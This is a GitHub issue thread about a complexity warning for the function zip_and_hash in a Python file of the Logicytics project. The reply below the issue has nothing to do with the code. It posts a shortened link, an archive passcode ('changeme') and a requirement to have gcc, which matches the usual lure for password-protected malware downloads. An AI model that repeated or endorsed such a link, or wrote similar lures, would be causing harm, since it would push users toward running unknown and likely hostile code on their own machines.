### ISSUE TITLE
Fix "method_complexity" issue in CODE/_zipper.py

### ISSUE THREAD

**Issue by DefinetlyNotAI** [DefinetlyNotAI/Logicytics#85]
Function `zip_and_hash` has a Cognitive Complexity of 7 (exceeds 5 allowed). Consider refactoring.

https://codeclimate.com/github/DefinetlyNotAI/Logicytics/CODE/_zipper.py#issue_66d96510e36f97000100002a

**Comment by sanketkorde** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
